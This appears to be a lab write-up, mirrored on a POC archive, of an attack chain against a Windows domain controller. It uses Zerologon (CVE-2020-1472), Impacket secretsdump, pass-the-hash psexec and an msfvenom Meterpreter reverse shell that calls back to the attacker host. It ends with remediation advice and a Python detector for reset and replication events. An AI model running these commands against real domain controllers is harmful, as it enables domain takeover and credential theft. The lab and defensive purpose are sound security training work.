Related vulnerability
Title: Microsoft Windows Netlogon security feature issue vulnerability (CVE-2020-1472)
Description: Microsoft Windows Netlogon is a core component of Microsoft Windows. Its main functions are authenticating users and machines on the domain network and replicating the database for domain controller backup; it also maintains the relationships between domain members and the domain, between the domain and domain controllers, and between a domain's DCs and DCs in other domains. Microsoft Windows Netlogon contains a security vulnerability. An attacker can use the Netlogon Remote Protocol (MS-NRPC) to establish a vulnerable Netlogon secure channel connection to a domain controller and escalate privileges.
Description
End-to-end Domain Controller exploitation using Metasploit and Impacket: discovered DC10, exploited Zerologon (CVE-2020-1472), extracted NTLM hashes, gained SYSTEM shell, and established a Meterpreter session.
Introduction
# Domain-Controller-DC-Exploitation-with-Metasploit-Impacket
**Executive Summary**
This exercise demonstrates a complete, realistic attack chain against a domain controller that was vulnerable to CVE-2020-1472 (Zerologon). The engagement included discovery, service enrichment, exploitation, credential extraction, lateral movement, and post-exploitation validation. I successfully obtained SYSTEM-level access and established a persistent Meterpreter session on the DC using a combination of Zerologon, Impacket secretsdump + pass-the-hash, and msfvenom/meterpreter payloads. Screenshots and command artifacts were captured at each stage as evidence.
**Lab overview:**
Simulated a full attack chain on a **Windows Domain Controller** using **Metasploit** and **Impacket**: discovery, Zerologon, secretsdump, pass-the-hash, and a controlled Meterpreter session.
**Why it matters to organizations:**
Because the DC controls authentication, group policy, and identity for the entire domain, a compromise can cascade into full business disruption, account takeovers, data exfiltration, ransomware deployment, and loss of regulatory trust. Protecting DCs safeguards uptime, revenue, and reputation by preventing attackers from turning identity into a single point of failure.
# Domain Controller (DC) Exploitation with Metasploit + Impacket
### SCENARIO
You are provided with two machines in a contained lab network. One system is a Windows Domain Controller (DC) named DC10 that hosts core AD services. The other system is a Kali workstation placed in the same server subnet for testing. The DC is assumed to expose typical domain services (for example, LDAP, Kerberos, SMB) and may be vulnerable to known issues. The Kali host is expected to be used for reconnaissance, exploitation, credential access, lateral movement, and post-exploitation validation. The task is to identify the DC, confirm domain details, obtain an initial foothold using an applicable technique, extract credential material to enable administrative access, and then demonstrate control of the DC through a remote shell and a managed agent session, while adapting to any environmental constraints such as patched services, restricted egress, or endpoint defenses.
DC: 10.1.16.1
Kali: 10.1.16.66
### Key Findings
- Critical vulnerability exploited: CVE-2020-1472 (Zerologon) was successfully exploited to reset the DC machine account password to empty.
- Credential compromise: NTLM hashes were extracted from the DC (secretsdump), revealing Administrator credentials enabling pass-the-hash.
- Complete domain control demonstrated: Using extracted hashes, a SYSTEM shell on DC10 was obtained (psexec), and a stable Meterpreter reverse shell was run, confirming remote code execution and persistence.
- Exposed services: LDAP, Kerberos, SMB and related RPC services were reachable from the attacking host, enabling discovery and exploitation.
- Attack surface risk: The DC accepted remote operations which allowed machine account manipulation and remote payload execution.
### 1) Discovery and Scoping
I used msfconsole with DB support, ran an nmap sweep from within MSF, imported results, and refined hosts and services to confirm DC10 exposure.
- Launched msfconsole with DB support and confirmed database connectivity.
- Ran an nmap scan across the subnet from msfconsole and imported results into the MSF DB.
- Cleaned the hosts table to remove my Kali IP. Reviewed services to spot likely DC indicators.
- Used MSF’s SYN port scanner with a constrained port range and global threading to refine service data.
- Fingerprinted SMB on Windows hosts to enrich OS details.
- Confirmed LDAP and Kerberos services on 10.1.16.1 and verified the domain name via an LDAP query.
- Decision: Treat 10.1.16.1 as the DC focus for exploitation and credential access.
<img width="655" height="197" alt="Image" src="https://github.com/user-attachments/assets/7f0e7560-bbe6-4111-b0b2-01d2675a03e6" />
<img width="816" height="609" alt="Image" src="https://github.com/user-attachments/assets/a46dddad-3248-4edb-a8f3-3d9e4015df74" />
<img width="1051" height="382" alt="Image" src="https://github.com/user-attachments/assets/47099e7b-ae0b-429e-b6d3-aec6ab300b06" />
### 2) Service Enrichment and DC Confirmation
I performed a SYN port scan in MSF, fingerprinted SMB, and confirmed LDAP and Kerberos on 10.1.16.1. I queried LDAP to retrieve the domain name.
<img width="1053" height="678" alt="Image" src="https://github.com/user-attachments/assets/543aace3-f376-40c5-8e87-b8639406f64e" />
<img width="1058" height="637" alt="Image" src="https://github.com/user-attachments/assets/fe45e6ca-2ef2-4cfd-ad0a-ebb286511358" />
<img width="1106" height="292" alt="Image" src="https://github.com/user-attachments/assets/002f5dc6-8740-4fd3-935b-c9f12c8e7262" />
<img width="1023" height="646" alt="Image" src="https://github.com/user-attachments/assets/c7648754-c64f-4e10-9c3f-12f4d39bf281" />
<img width="1000" height="660" alt="Image" src="https://github.com/user-attachments/assets/8db34cd0-60af-4bfc-be0c-52cebfaf7e3f" />
### SMB version check
- I used the SMB version module in msfconsole: `auxiliary/scanner/smb/smb_version`.
- I set the targets from the hosts table with `hosts -R`.
- Got SMB dialect and OS details back.
- Result: 10.1.16.1 showed Windows Server info, which lined up with it being the Domain Controller.
<img width="1117" height="477" alt="Image" src="https://github.com/user-attachments/assets/72970256-7ce2-4b6f-9265-1d7a723bfdf6" />
<img width="1120" height="527" alt="Image" src="https://github.com/user-attachments/assets/c38a859a-e269-4d19-b7d6-119afc5c28da" />
<img width="1029" height="458" alt="Image" src="https://github.com/user-attachments/assets/6db792fe-e09c-47e1-a908-256d8ea27a98" />
<img width="1056" height="486" alt="Image" src="https://github.com/user-attachments/assets/a877ba7f-5e72-44c4-83a6-4cc3e546081f" />
<img width="1053" height="678" alt="Image" src="https://github.com/user-attachments/assets/34a01c5a-4719-439a-a1e1-ede9371d9c85" />
### LDAP query
- For the LDAP query module, I used `auxiliary/gather/ldap_query`.
- Set `rhosts` to 10.1.16.1 to hit DC10 directly.
- I ran it to pull basic directory info.
- Result: Confirmed the domain name as “structureality” and that LDAP on the DC was responding.
<img width="1054" height="292" alt="Image" src="https://github.com/user-attachments/assets/ab9922a5-05ad-4acc-ad88-95a9134fbcfb" />
<img width="1058" height="637" alt="Image" src="https://github.com/user-attachments/assets/7757139c-0acc-42c9-a590-5fa8a5491ad4" />
<img width="1106" height="292" alt="Image" src="https://github.com/user-attachments/assets/61ead019-4714-432e-8f1b-7b5cabe79cb9" />
<img width="1065" height="212" alt="Image" src="https://github.com/user-attachments/assets/f07e4379-8c60-468b-aa23-58e1e9c14953" />
### 3) Zerologon Exploitation (Initial Access)
I ran **auxiliary/admin/dcerpc/cve_2020_1472_zerologon** against DC10 to reset the machine account password to empty.
<img width="1093" height="630" alt="Image" src="https://github.com/user-attachments/assets/2dc71304-1978-4ae9-b7ee-9e9207e24a14" />
<img width="1054" height="532" alt="Image" src="https://github.com/user-attachments/assets/c35345db-78e2-40d9-95df-7ba573fb09ca" />
### 4) Credential Access (secretsdump)
Using Impacket, I dumped NTLM hashes from the DC and identified Administrator credentials for pass-the-hash.
**`impacket-secretsdump -just-dc-ntlm structureality/dc10\$@10.1.16.1`**
<img width="1068" height="206" alt="Image" src="https://github.com/user-attachments/assets/874bfe89-396a-43a5-a276-a3408b4f1f73" />
<img width="1062" height="464" alt="Image" src="https://github.com/user-attachments/assets/e306711f-2cc1-4431-8353-2835eb869ce1" />
### 5) Lateral Movement (psexec)
I used pass-the-hash with psexec to obtain a SYSTEM-level shell on DC10 and validated host identity.
**`impacket-psexec structureality/administrator@10.1.16.1 -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9`**
As you can see, I am already in **C:\Windows\system32**.
<img width="1056" height="311" alt="Image" src="https://github.com/user-attachments/assets/428e7417-b267-4b69-a944-73e02ac7cb53" />
<img width="2567" height="304" alt="Image" src="https://github.com/user-attachments/assets/1a06ddca-81fc-4ce1-820c-96631467514e" />
### 6) Post-Exploitation (Meterpreter)
I generated a reverse_tcp meterpreter payload, hosted it over HTTP, downloaded it to DC10, started a handler, and executed the payload to open a Meterpreter session.
**`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe`**
<img width="1017" height="194" alt="Image" src="https://github.com/user-attachments/assets/efaf81af-6f21-4126-a71e-7107b83514e7" />
<img width="1073" height="305" alt="Image" src="https://github.com/user-attachments/assets/a970a71f-8765-45fd-941b-c4954394a072" />
I launched a basic web server to allow the target system to easily access this meterpreter executable by using:
**`python3 -m http.server 8080`**
<img width="674" height="120" alt="Image" src="https://github.com/user-attachments/assets/57645185-3d3c-48c3-9cda-fd87e9134643" />
On the target machine, I executed the meterpreter executable (secret.exe)
<img width="950" height="85" alt="Image" src="https://github.com/user-attachments/assets/71bee5d8-6348-4854-804c-17303548180b" />
<img width="992" height="227" alt="Image" src="https://github.com/user-attachments/assets/30164cc7-95c9-42a0-9973-f94bfa91bb7f" />
<img width="910" height="617" alt="Image" src="https://github.com/user-attachments/assets/60a8a3c9-f26b-4cc7-9842-9c5ccdd254da" />
<img width="992" height="227" alt="Image" src="https://github.com/user-attachments/assets/ae9cb83a-ba7a-4e63-a395-daac0beca618" />
<img width="855" height="581" alt="Image" src="https://github.com/user-attachments/assets/ffe928ac-bb49-4a9d-9ec5-ca5fa3ad86a3" />
As you can see, I have now established a reverse shell connection between the target DC10 and Kali systems. This was accomplished by using only external/remote exploits against the vulnerable target.
While the Kali system is located in the server subnet along with the DC10 target, **these types of attacks are possible over the internet if the target system is exposed to the open internet**.
### 7) Key Outcomes
- DC10 identified as domain controller for structureality
- Zerologon succeeded, enabling credential extraction
- Administrator hash used for SYSTEM shell via pass-the-hash
- Stable Meterpreter session confirmed on DC10
### Evidence
- MSF DB and nmap subnet scan logs confirming host/service discovery.
- SMB/LDAP/Kerberos enumeration output confirming DC services and domain name structureality.
- Zerologon module output showing machine account password reset to empty.
- secretsdump output with extracted NTLM hashes.
- psexec session logs demonstrating C:\Windows\System32.
- msfvenom and Meterpreter session screenshots confirming remote control.
### Actions Performed (summary)
- Discovery & Scoping: nmap scans from msfconsole; MSF DB used to manage hosts/services; confirmed DC10 as target.
- Service Enrichment: SMB fingerprinting, LDAP queries, Kerberos confirmation to validate domain controller role.
- Initial Access: Ran auxiliary/admin/dcerpc/cve_2020_1472_zerologon to reset DC machine account password.
- Credential Access: impacket-secretsdump to extract NTLM hashes from DC.
- Lateral Movement: impacket-psexec using Administrator NTLM hash → SYSTEM shell.
- Post-Exploitation: Built and hosted meterpreter payload (msfvenom), downloaded and executed on DC, and confirmed persistent session.
### Recommendations for the Network Owners
- Patch Netlogon vulnerability immediately and verify with a scan for CVE-2020-1472 exposure
- Enforce SMB signing and restrict DC SMB and RPC exposure to trusted admin subnets only
- Implement tiered admin and deny remote service execution from non-admin management hosts
- Disable or tightly control NTLM, prefer Kerberos, and monitor for pass-the-hash patterns
- Egress control: restrict outbound connections from servers, allowlist only required destinations and ports
- Endpoint protection: block unsigned binaries and apply AMSI-integrated scanning to PowerShell
- Monitoring: alert on machine account password resets, anomalous DRSUAPI access, and unexpected handler-like listeners
- Regularly rotate privileged credentials and use LAPS or PAM solutions to reduce hash reuse risk
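The two monitoring items above (machine account password resets and anomalous DRSUAPI access) can be checked against the DC's Security log. The following is an added example, not part of the lab README; it runs over constructed Windows Security event records whose field names follow the Security log's EventData names (assumed to have been parsed from XML beforehand), and DC11 at 10.1.16.2 is a made-up replication partner used only to show a benign case.

```python
from collections import namedtuple
from typing import Iterable

# Replication control-access rights; a DCSync-style dump requests the same rights.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
Finding = namedtuple("Finding", "event_id reason subject detail")

def scan(events: Iterable[dict], dc_accounts: set, dc_addrs: set) -> list:
    """Walk Security events in order; 4624 logons are remembered so a later 4662
    can be tied to the network address its subject logged on from."""
    logon_src, findings = {}, []
    for ev in events:
        eid, subject = ev["EventID"], ev.get("SubjectUserName", "")
        if eid == 4624:
            logon_src[ev["TargetLogonId"]] = ev.get("IpAddress", "-")
        elif eid == 4742:
            # Computer account changed with a new PasswordLastSet, attributed to
            # ANONYMOUS LOGON: the trace commonly documented for an unauthenticated Netlogon reset.
            target = ev.get("TargetUserName", "")
            if (target.endswith("$") and ev.get("PasswordLastSet", "-") != "-"
                    and subject.upper() == "ANONYMOUS LOGON"):
                findings.append(Finding(eid, "anonymous machine account password reset", subject, target))
        elif eid == 4662 and REPL_GUIDS & set(ev.get("Properties", [])):
            # Replication is routine between DCs; flag a non-DC requester, or a DC
            # account logged on from a non-DC address (the lab's dump ran as dc10$
            # but came from the Kali host, which a plain account check would miss).
            src = logon_src.get(ev.get("SubjectLogonId", ""), "-")
            if subject not in dc_accounts or src not in dc_addrs:
                findings.append(Finding(eid, "replication rights from unexpected source", subject, src))
    return findings

# Constructed sample events. DC10 (10.1.16.1) and Kali (10.1.16.66) are the lab's
# hosts; DC11 (10.1.16.2) is a made-up replication partner.
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC10$",
     "PasswordLastSet": "9/1/2025 10:02:11 AM"},
    {"EventID": 4742, "SubjectUserName": "Administrator", "TargetUserName": "WS01$",
     "PasswordLastSet": "-"},                                  # attribute change only
    {"EventID": 4624, "TargetUserName": "DC10$", "TargetLogonId": "0x3e7a1", "IpAddress": "10.1.16.66"},
    {"EventID": 4662, "SubjectUserName": "DC10$", "SubjectLogonId": "0x3e7a1",
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},  # dump from the Kali host
    {"EventID": 4624, "TargetUserName": "DC11$", "TargetLogonId": "0x3e7b2", "IpAddress": "10.1.16.2"},
    {"EventID": 4662, "SubjectUserName": "DC11$", "SubjectLogonId": "0x3e7b2",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},  # normal DC-to-DC replication
]
DC_ACCOUNTS, DC_ADDRS = {"DC10$", "DC11$"}, {"10.1.16.1", "10.1.16.2"}
```

`scan(SAMPLE_EVENTS, DC_ACCOUNTS, DC_ADDRS)` returns two findings: the anonymous reset of DC10$ and the replication read by DC10$ from 10.1.16.66; a 4662 whose logon cannot be matched to a 4624 is also flagged, since its source is unknown.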
File snapshot
[4.0K] /data/pocs/2f15847d8d58055f6f78d287e990b1031959e688
└── [ 13K] README.md
1 directory, 1 file
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.